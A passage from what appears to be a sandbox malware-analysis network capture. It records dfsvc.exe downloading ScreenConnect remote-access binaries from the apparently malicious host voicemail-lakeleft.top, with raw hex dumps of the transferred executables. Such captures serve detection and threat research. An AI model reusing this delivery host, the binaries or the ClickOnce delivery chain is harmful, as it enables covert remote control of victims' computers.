                                                                                                                                                                                                                                                                  2024-11-08 10:09:37 UTC16384INData Raw: 27 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69 02 c3 17 14 01 29 05 7a 2d f6 00 59 03 d0 2d 06 16 a4
                                                                                                                                                                                                                                                                  Data Ascii: '--.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi)z-Y-
                                                                                                                                                                                                                                                                  2024-11-08 10:09:37 UTC16384INData Raw: 69 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70 44 6f 6d 61 69 6e 45 78 63 65 70 74 69 6f 6e 00 49 6e
                                                                                                                                                                                                                                                                  Data Ascii: ityActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogAppDomainExceptionIn
                                                                                                                                                                                                                                                                  2024-11-08 10:09:37 UTC2776INData Raw: 00 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68
                                                                                                                                                                                                                                                                  Data Ascii: SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProcessIDExecutablePath


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  10192.168.2.749798194.59.30.2014432628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-11-08 10:09:38 UTC100OUTGET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                                  2024-11-08 10:09:38 UTC218INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  Content-Length: 1721856
                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:09:38 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-11-08 10:09:38 UTC16166INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c da d0 ab 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 82 5d 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 5b ab 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELl" 0>] ` [@
                                                                                                                                                                                                                                                                  2024-11-08 10:09:38 UTC16384INData Raw: 00 00 0a 14 04 05 16 28 ba 00 00 06 13 06 de 11 09 28 01 02 00 0a dc 06 2c 06 06 6f 11 00 00 0a dc 11 06 2a 00 00 01 34 00 00 02 00 99 00 0a a3 00 0c 00 00 00 00 02 00 81 00 2e af 00 0c 00 00 00 00 02 00 73 00 87 fa 00 07 00 00 00 00 02 00 06 00 fb 01 01 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 e0 00 00 06 72 71 06 00 70 28 02 02 00 0a 0a 02 06 28 bd 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 be 00 00 06 18 8d d9 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 03 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 04 02 00 0a 73 05 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0d 01 00 06 1f 0a 16 20 7c 4f 00 00 73 07 02 00 0a 28 6e 01 00 0a 2c 35
                                                                                                                                                                                                                                                                  Data Ascii: ((,o*4.s0*(~^(rqp((*0G%-&(%rp%rp(~%-&s%(2+*0:( |Os(n,5
                                                                                                                                                                                                                                                                  2024-11-08 10:09:38 UTC16384INData Raw: fc 00 00 04 7d f8 00 00 04 02 17 7d f7 00 00 04 17 2a 02 15 7d f7 00 00 04 02 02 7b fc 00 00 04 18 28 aa 01 00 06 7d fc 00 00 04 02 7b fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c ce 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4d 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 53 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a 02 15 7d fd 00 00 04 1f 09 0b 02 17 07 25 17 58 0b 1f
                                                                                                                                                                                                                                                                  Data Ascii: }}*}{(}{(-*{*s{z2{*0<{3{(NoO3}+sM{}*(S*z(,}(NoO}**0{,;*}%X
                                                                                                                                                                                                                                                                  2024-11-08 10:09:38 UTC16384INData Raw: 6e 22 06 00 71 cc 6e 22 06 00 48 cf 6e 22 06 00 5e 3e 6e 22 06 00 9f a3 6e 22 06 00 c4 b2 a0 02 06 00 36 b2 6e 22 06 00 49 a7 a0 02 06 00 41 a7 6e 22 06 00 81 cc 6e 22 06 00 af 54 6e 22 06 00 ba 90 6e 22 06 00 9f a3 6e 22 06 00 7c aa 6e 22 06 00 f7 cf 71 22 06 00 ce 45 71 22 06 00 66 46 6e 22 06 00 07 59 6e 22 06 00 b6 bf 6e 22 06 00 31 6a 6e 22 06 00 8f 9f 6e 22 06 00 e8 60 6e 22 06 00 48 cf 6e 22 06 00 f4 5f 6e 22 06 00 04 52 25 25 06 00 e3 be 6e 22 06 00 5b be 6e 22 06 10 55 51 f7 25 06 06 80 30 af 08 56 80 80 c8 fb 25 56 80 69 c8 fb 25 06 06 80 30 af 08 56 80 35 9d 00 26 06 06 80 30 af 08 56 80 62 27 05 26 56 80 90 29 05 26 56 80 e3 0d 05 26 56 80 86 29 05 26 06 06 80 30 6e 22 56 80 2c 39 0a 26 56 80 97 c8 0a 26 56 80 5f 39 0a 26 56 80 60 bd 0a 26 56
                                                                                                                                                                                                                                                                  Data Ascii: n"qn"Hn"^>n"n"6n"IAn"n"Tn"n"n"|n"q"Eq"fFn"Yn"n"1jn"n"`n"Hn"_n"R%%n"[n"UQ%0V%Vi%0V5&0Vb'&V)&V&V)&0n"V,9&V&V_9&V`&V
                                                                                                                                                                                                                                                                  2024-11-08 10:09:38 UTC16384INData Raw: c6 00 5e 53 10 00 0f 07 5e a5 00 00 00 00 91 18 18 99 0e 27 10 07 6a a5 00 00 00 00 86 18 ed 98 01 00 10 07 72 a5 00 00 00 00 83 00 d7 02 29 3b 10 07 7a a5 00 00 00 00 83 00 81 0a 30 3b 12 07 82 a5 00 00 00 00 86 18 ed 98 01 00 13 07 8a a5 00 00 00 00 83 00 d6 07 1b 3b 13 07 9d a5 00 00 00 00 91 18 18 99 0e 27 14 07 a9 a5 00 00 00 00 86 18 ed 98 01 00 14 07 b1 a5 00 00 00 00 83 00 ab 02 39 3b 14 07 b9 a5 00 00 00 00 83 00 55 0a 39 3b 15 07 c1 a5 00 00 00 00 86 18 ed 98 05 00 16 07 e0 a5 00 00 00 00 e1 01 ac 58 01 00 17 07 18 a6 00 00 00 00 e1 01 37 c2 3d 00 17 07 e4 a7 00 00 00 00 81 00 d5 0d 01 00 17 07 00 a8 00 00 00 00 e1 09 d0 bb e0 18 17 07 08 a8 00 00 00 00 e1 01 13 b6 01 00 17 07 0f a8 00 00 00 00 e1 09 96 bc 4e 00 17 07 18 a8 00 00 00 00 e1 01 bd
                                                                                                                                                                                                                                                                  Data Ascii: ^S^'jr);z0;;'9;U9;X7=N
                                                                                                                                                                                                                                                                  2024-11-08 10:09:38 UTC16384INData Raw: 5b 34 45 10 a9 06 0b 5f 39 02 3c 04 8d 4a a0 02 91 04 5f 46 01 00 89 06 8d 58 39 02 d1 03 86 c7 01 00 69 04 a6 58 01 00 71 09 dc 37 b1 1a 71 09 1c 36 89 01 59 06 ab cc e9 1a e1 02 ed 98 f8 1a e1 02 ed 98 07 1b 41 06 ed 98 10 00 b9 08 ae 9e 16 1b 19 0a 85 3e 1d 1b 29 02 96 4c 7c 04 31 02 ed 98 01 00 99 04 68 53 f5 09 c1 09 21 5b 10 00 39 02 96 4c 7c 04 39 02 35 70 89 01 99 02 e2 6a 7c 04 99 02 28 59 3b 1b b1 07 1b 6b 3d 0b 4c 04 a8 98 5b 00 54 04 b5 bc 49 00 44 02 ab 0d d9 00 08 00 14 00 25 1c 08 00 18 00 2a 1c 08 00 1c 00 2f 1c 08 00 20 00 34 1c 08 00 b8 00 39 1c 0e 00 bc 00 3e 1c 0e 00 c0 00 51 1c 0e 00 c4 00 62 1c 08 00 c8 00 75 1c 08 00 cc 00 7a 1c 0e 00 d0 00 7f 1c 0e 00 d4 00 8e 1c 0e 00 d8 00 9d 1c 0e 00 e0 00 c6 1c 08 00 f0 00 64 1d 08 00 f4 00 69
                                                                                                                                                                                                                                                                  Data Ascii: [4E_9<J_FX9iXq7q6YA>)L|1hS![9L|95pj|(Y;k=L[TID%*/ 49>Qbuzdi
                                                                                                                                                                                                                                                                  2024-11-08 10:09:38 UTC16384INData Raw: 3e 39 5f 5f 31 33 35 5f 31 00 3c 47 65 74 46 75 6c 6c 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 3e 62 5f 5f 31 33 35 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 34 37 5f 31 00 3c 43 6f 6e 6e 65 63 74 53 65 72 76 65 72 43 6c 69 65 6e 74 4e 61 6d 65 64 50 69 70 65 73 3e 67 5f 5f 57 61 69 74 41 6e 64 43 6f 6e 6e 65 63 74 4e 61 6d 65 64 50 69 70 65 7c 39 37 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 37 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 39 5f 5f 32 39 5f 31 00 3c 54 72 79 47 65 74 41 63 74 69 76 65 43 6f 6e 73 6f 6c 65 53 65 73 73 69 6f 6e 49 44 3e 62 5f 5f
                                                                                                                                                                                                                                                                  Data Ascii: >9__135_1<GetFullExecutablePath>b__135_1<>c__DisplayClass47_1<ConnectServerClientNamedPipes>g__WaitAndConnectNamedPipe|97_1<PopulateContextMenuStripItems>b__7_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>9__29_1<TryGetActiveConsoleSessionID>b__
                                                                                                                                                                                                                                                                  2024-11-08 10:09:38 UTC16384INData Raw: 62 61 73 65 4b 65 79 48 61 6e 64 6c 65 00 6c 69 62 72 61 72 79 48 61 6e 64 6c 65 00 72 65 73 75 6d 65 5f 68 61 6e 64 6c 65 00 54 6f 52 65 63 74 61 6e 67 6c 65 00 47 65 74 43 6c 69 65 6e 74 52 65 63 74 61 6e 67 6c 65 00 47 65 74 57 69 6e 64 6f 77 52 65 63 74 61 6e 67 6c 65 00 72 65 63 74 61 6e 67 6c 65 00 70 44 61 74 61 46 69 6c 65 00 75 6c 6c 54 6f 74 61 6c 50 61 67 65 46 69 6c 65 00 75 6c 6c 41 76 61 69 6c 50 61 67 65 46 69 6c 65 00 43 72 65 61 74 65 46 69 6c 65 00 68 54 65 6d 70 6c 61 74 65 46 69 6c 65 00 44 65 6c 65 74 65 46 69 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c
                                                                                                                                                                                                                                                                  Data Ascii: baseKeyHandlelibraryHandleresume_handleToRectangleGetClientRectangleGetWindowRectanglerectanglepDataFileullTotalPageFileullAvailPageFileCreateFilehTemplateFileDeleteFileMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHel
                                                                                                                                                                                                                                                                  2024-11-08 10:09:38 UTC16384INData Raw: 70 00 3c 39 3e 5f 5f 43 6c 6f 73 65 44 65 73 6b 74 6f 70 00 43 72 65 61 74 65 44 65 73 6b 74 6f 70 00 53 77 69 74 63 68 44 65 73 6b 74 6f 70 00 4f 70 65 6e 44 65 73 6b 74 6f 70 00 6c 70 44 65 73 6b 74 6f 70 00 54 72 79 45 6e 73 75 72 65 54 68 72 65 61 64 4f 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 4f 70 65 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 6c 70 73 7a 44 65 73 6b 74 6f 70 00 64 65 73 6b 74 6f 70 00 65 5f 73 70 00 55 72 69 53 63 68 65 6d 65 48 74 74 70 00 4e 61 74 69 76 65 43 6c 65 61 6e 75 70 00 6c 70 4c 6f 61 64 4f 72 64 65 72 47 72 6f 75 70 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e
                                                                                                                                                                                                                                                                  Data Ascii: p<9>__CloseDesktopCreateDesktopSwitchDesktopOpenDesktoplpDesktopTryEnsureThreadOnInputDesktopOpenInputDesktoplpszDesktopdesktope_spUriSchemeHttpNativeCleanuplpLoadOrderGroupGetLastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.
                                                                                                                                                                                                                                                                  2024-11-08 10:09:38 UTC16384INData Raw: 00 4f 70 65 6e 52 65 67 69 73 74 72 79 4b 65 79 00 43 72 65 61 74 65 50 72 6f 70 65 72 74 79 4b 65 79 00 47 65 74 48 6f 74 6b 65 79 00 53 65 74 48 6f 74 6b 65 79 00 70 77 48 6f 74 6b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 67 65 74 5f 46 6f 6e 74 46 61 6d 69 6c 79 00 44 65 66 61 75 6c 74 46 6f 6e 74 46 61 6d 69 6c 79 00 54 72 79 44 69 73 61 62 6c 65 46 69 6c 65 53 79 73 74 65 6d 52 65 64 69 72 65 63 74 69 6f 6e 54 65 6d 70 6f 72 61 72 69 6c 79 00 73 65 74 5f 52 65 61 64 4f 6e 6c 79 00 44 69 73 70 6f 73 65 51 75 69 65 74 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79
                                                                                                                                                                                                                                                                  Data Ascii: OpenRegistryKeyCreatePropertyKeyGetHotkeySetHotkeypwHotkeySystem.Security.Cryptographyget_Assemblyget_FontFamilyDefaultFontFamilyTryDisableFileSystemRedirectionTemporarilyset_ReadOnlyDisposeQuietlypointlySelectManyShutdownBlockReasonDestroy


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  11192.168.2.749814194.59.30.2014432628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-11-08 10:09:40 UTC106OUTGET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                                  2024-11-08 10:09:41 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  Content-Length: 601376
                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:09:41 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-11-08 10:09:41 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 3c 99 98 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 fc 08 00 00 06 00 00 00 00 00 00 92 15 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 19 78 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{<"0 @ `x@
                                                                                                                                                                                                                                                                  2024-11-08 10:09:41 UTC16384INData Raw: 00 0a 2a 00 00 1b 30 06 00 ef 0d 00 00 2c 00 00 11 73 ab 07 00 06 0a 06 02 7d 14 03 00 04 28 75 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 76 01 00 0a 28 77 01 00 0a 16 8d 11 00 00 01 28 78 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 cf 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e a9 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 25 07 00 06 73 d0 01 00 0a 25 80 a9 02 00 04 28 33 00 00 2b 6f d1 01 00 0a 0d 38 24 0c 00 00 12 04 09 6f d2 01 00 0a 7d 16 03 00 04 11 04 7b 16 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 16 03 00 04 6f 15 03 00 06 28 36 06 00 06 13 06 11 04 7b 16 03 00 04 6f 29 03 00 06 28 4a 06 00 06 13 07 11 04 7b 16 03 00 04 6f 2a 03 00 06 28 4a 06 00 06 13 08 11 04 7b 16 03 00 04 6f 15 03 00 06 02 28 fb 00 00 06 25 13 0e 6f a2 00 00 0a
                                                                                                                                                                                                                                                                  Data Ascii: *0,s}(u,rp(v(w(x}H((((~%-&~%s%(3+o8$o}{(,+{o(6{o)(J{o*(J{o(%o
                                                                                                                                                                                                                                                                  2024-11-08 10:09:41 UTC16384INData Raw: 02 7b 54 00 00 04 6f 0b 07 00 06 18 2e 0c 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 00 00 13 30 03 00 62 00 00 00 00 00 00 00 02 7b 54 00 00 04 6f 14 03 00 0a 2c 4d 02 7b 5a 00 00 04 28 a9 00 00 06 6f b8 04 00 06 02 7b 54 00 00 04 16 6f a2 00 00 0a 02 7b 54 00 00 04 02 7b 54 00 00 04 6f 14 03 00 0a 74 9a 00 00 01 17 6f 15 03 00 0a 26 02 7b 54 00 00 04 14 6f 7b 01 00 0a 02 17 28 3c 01 00 06 2a 02 16 28 3c 01 00 06 2a 00 00 13 30 05 00 90 00 00 00 47 00 00 11 72 1d 14 00 70 18 8d 11 00 00 01 25 16 03 8c 33 02 00 01 a2 25 17 02 7b 54 00 00 04 6f 0b 07 00 06 8c b6 00 00 02 a2 28 07 03 00 0a 02 7b 54 00 00 04 6f 0b 07 00 06 0a 06 17 2e 06 06 18 2e 27 2b 35 02 7b 5a 00 00 04 28 aa 00 00 06 6f b8 04 00 06 03 2d 22 02 28 ae 00 00 06 73 0a 03 00 0a 6f 45 01 00 0a 2b
                                                                                                                                                                                                                                                                  Data Ascii: {To.{To*0b{To,M{Z(o{To{T{Toto&{To{(<*(<*0Grp%3%{To({To..'+5{Z(o-"(soE+
                                                                                                                                                                                                                                                                  2024-11-08 10:09:41 UTC16384INData Raw: 73 27 04 00 0a 28 b2 00 00 2b 28 b3 00 00 2b 6f 28 04 00 0a 2a c2 02 28 29 04 00 0a 02 7e 2a 04 00 0a 28 2b 04 00 0a 02 20 02 60 00 00 17 28 2c 04 00 0a 02 02 fe 06 dd 01 00 06 73 2d 04 00 0a 28 2e 04 00 0a 2a 1e 02 7b 9b 00 00 04 2a 22 02 03 7d 9b 00 00 04 2a 1e 02 7b 9c 00 00 04 2a 22 02 03 7d 9c 00 00 04 2a 1e 02 7b 9d 00 00 04 2a 22 02 03 7d 9d 00 00 04 2a 1e 02 7b 9e 00 00 04 2a 22 02 03 7d 9e 00 00 04 2a 1e 02 7b 9f 00 00 04 2a 22 02 03 7d 9f 00 00 04 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 1e 02 7b a3 00 00 04 2a 22 02 03 7d a3 00 00 04 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00
                                                                                                                                                                                                                                                                  Data Ascii: s'(+(+o(*()~*(+ `(,s-(.*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}
                                                                                                                                                                                                                                                                  2024-11-08 10:09:41 UTC16384INData Raw: 00 0a 2c 07 02 28 a4 02 00 06 2a 02 6f 18 04 00 0a 2a 00 00 00 13 30 02 00 51 00 00 00 93 00 00 11 02 28 61 05 00 0a 2d 1d 02 28 9b 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 9b 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a2 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 a2 02 00 06 2a 02 6f 17 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 9f 02 00 06 2c 07 02 28 9f 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 a6 02 00 06 2c 07 02 28 a6 02 00 06 2a 02 6f c6 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 a1 02 00 06 2c 07 02 28 a1 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 aa 02 00 06 2c 07 02 28 aa 02 00 06 2a 02 28 99 02 00 06 2a 00 00 00 1b 30 06 00 f0 00 00 00 94 00 00 11 02 03 28 ce 01 00 06 02 6f c4 02 00 06 0a 12 00 28 63
                                                                                                                                                                                                                                                                  Data Ascii: ,(*o*0Q(a-((b,(*{,((b,(*o*(a-(,(*{,(,(*o*(a-(,(*{,(,(*(*0(o(c
                                                                                                                                                                                                                                                                  2024-11-08 10:09:41 UTC16384INData Raw: 08 06 00 0a 2a 32 02 7b 38 01 00 04 6f 09 06 00 0a 2a 36 02 7b 38 01 00 04 03 6f 0a 06 00 0a 2a 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b9 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 07 00 29 00 00 00 5a 00 00 11 02 02 7b 3a 01 00 04 73 8a 03 00 06 25 02 02 7b 39 01 00 04 0a 06 17 58 7d 39 01 00 04 06 6f 89 03 00 06 28 50 01 00 2b 2a 66 02 16 7d 39 01 00 04 02 28 83 03 00 06 02 7b 38 01 00 04 6f 0b 06 00 0a 2a 1e 02 28 83 03 00 06 2a 32 02 7b 38 01 00 04 6f 0c 06 00 0a 2a 32 02 7b 38 01 00 04 28 72 01
                                                                                                                                                                                                                                                                  Data Ascii: *2{8o*6{8o*0){:(t|:(O+3*0){:(t|:(O+3*0)Z{:s%{9X}9o(P+*f}9({8o*(*2{8o*2{8(r
